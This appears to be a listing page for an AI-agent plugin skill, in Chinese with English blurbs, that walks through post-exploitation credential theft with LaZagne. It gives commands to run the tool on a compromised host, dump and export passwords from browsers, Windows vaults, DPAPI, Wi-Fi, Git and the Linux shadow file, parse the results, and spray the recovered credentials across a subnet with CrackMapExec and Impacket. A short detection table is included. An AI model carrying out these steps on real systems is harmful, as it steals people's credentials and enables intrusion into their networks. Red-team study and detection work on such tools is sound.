Extracts stored credentials using LaZagne from browsers, databases, system key stores, and apps on controlled Windows/Linux/macOS terminals in authorized red team operations. Useful for post-exploitation credential access.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
LaZagne 是一个开源后渗透工具,旨在检索存储在本地系统上的凭据。它支持 Windows、Linux 和 macOS,Windows 上的模块库最为丰富。LaZagne 从浏览器(Chrome、Firefox、Edge、Opera)、邮件客户端(Outlook、Thunderbird)、数据库(PostgreSQL、MySQL、SQLite)、系统存储(Windows 凭据管理器、LSA 密钥、DPAPI)、Wi-Fi 配置文件、Git 凭据及数十种其他应用程序中恢复密码。该工具被归类为 MITRE ATT&CK T1555(来自密码存储的凭据),并作为软件 S0349 列出。红队在获得初始访问权限后使用 LaZagne 收集存储的凭据,从而实现横向移动和权限提升。
Extracts stored credentials from browsers, databases, system vaults, and apps using LaZagne on compromised Windows/Linux/macOS endpoints for authorized red team operations.
Extracts stored credentials from compromised endpoints using LaZagne for authorized red team operations, targeting browsers, databases, system vaults, and apps.
Extracts cached credentials, password hashes, Kerberos tickets, and auth tokens from memory dumps using Volatility, pypykatz, and Mimikatz for digital forensics and incident response.
Share bugs, ideas, or general feedback.
LaZagne 是一个开源后渗透工具,旨在检索存储在本地系统上的凭据。它支持 Windows、Linux 和 macOS,Windows 上的模块库最为丰富。LaZagne 从浏览器(Chrome、Firefox、Edge、Opera)、邮件客户端(Outlook、Thunderbird)、数据库(PostgreSQL、MySQL、SQLite)、系统存储(Windows 凭据管理器、LSA 密钥、DPAPI)、Wi-Fi 配置文件、Git 凭据及数十种其他应用程序中恢复密码。该工具被归类为 MITRE ATT&CK T1555(来自密码存储的凭据),并作为软件 S0349 列出。红队在获得初始访问权限后使用 LaZagne 收集存储的凭据,从而实现横向移动和权限提升。
# 预编译的可执行文件(Windows)
# 通过 C2 信道或文件上传传输 lazagne.exe
# Python 版本(需要目标上有 Python)
git clone https://github.com/AlessandroZ/LaZagne.git
cd LaZagne
pip install -r requirements.txt
# 检查当前用户上下文
whoami /priv
# LaZagne 对用户级存储使用标准用户权限
# DPAPI 主密钥、LSA 密钥、SAM 需要 SYSTEM/管理员权限
# 提取所有凭据
lazagne.exe all
# 导出结果为 JSON
lazagne.exe all -oJ
# 导出结果到特定文件
lazagne.exe all -oJ -output C:\Temp\creds
# 仅浏览器(Chrome、Firefox、Edge、Opera、IE)
lazagne.exe browsers
# Windows 凭据存储
lazagne.exe windows
# 数据库凭据
lazagne.exe databases
# 邮件客户端凭据
lazagne.exe mails
# Wi-Fi 密码
lazagne.exe wifi
# Git 凭据
lazagne.exe git
# 系统凭据(需要提升权限)
lazagne.exe sysadmin
# 完整提取
python3 laZagne.py all
# 浏览器凭据
python3 laZagne.py browsers
# 系统凭据(SSH 密钥、以 root 身份的 shadow 文件)
python3 laZagne.py sysadmin
# 数据库凭据
python3 laZagne.py databases
# Git 凭据
python3 laZagne.py git
import json
with open("creds.json") as f:
results = json.load(f)
for module in results:
for entry in module.get("results", []):
print(f"来源: {entry.get('Category')}")
print(f" 用户: {entry.get('Login', 'N/A')}")
print(f" URL/主机: {entry.get('URL', entry.get('Host', 'N/A'))}")
# 使用 CrackMapExec 测试域凭据
crackmapexec smb 10.10.10.0/24 -u recovered_user -p 'recovered_pass'
# 使用 Impacket 测试
smbclient.py domain.local/user:'password'@10.10.10.1
| 工具 | 用途 | 平台 |
|---|---|---|
| LaZagne | 多源凭据提取 | Windows/Linux/macOS |
| Mimikatz | LSASS/DPAPI 凭据转储 | Windows |
| SharpChrome | Chrome 凭据提取(.NET) | Windows |
| SharpDPAPI | DPAPI 凭据解密 | Windows |
| CrackMapExec | 凭据验证和喷洒 | Linux |
| Impacket | 远程凭据测试 | Linux(Python) |
| 类别 | 模块 |
|---|---|
| 浏览器 | Chrome、Firefox、Edge、Opera、IE、Brave、Vivaldi |
| 邮件 | Outlook、Thunderbird、Foxmail |
| 数据库 | PostgreSQL、MySQL、SQLiteDB、Robomongo |
| 系统管理 | PuTTY、WinSCP、FileZilla、OpenSSH、RDPManager |
| Windows | 凭据管理器、Vault、DPAPI、自动登录 |
| Wi-Fi | 存储的 Wi-Fi 密码 |
| Git | Git 凭据存储、Git 凭据管理器 |
| SVN | TortoiseSVN |
| 聊天 | Pidgin、Skype |
| 指标 | 检测方法 |
|---|---|
| LaZagne.exe 进程执行 | 基于哈希的 EDR 进程监控检测 |
| 访问 Chrome Login Data SQLite 数据库 | 浏览器凭据存储的文件访问监控 |
| DPAPI CryptUnprotectData API 调用 | API 钩子和 ETW 跟踪 |
| 访问 Windows 凭据管理器 | 事件 5379(凭据管理器读取) |
| 批量凭据存储枚举 | 用于顺序访问模式的行为分析 |
| Python 解释器访问凭据文件 | 脚本块日志和文件访问审计 |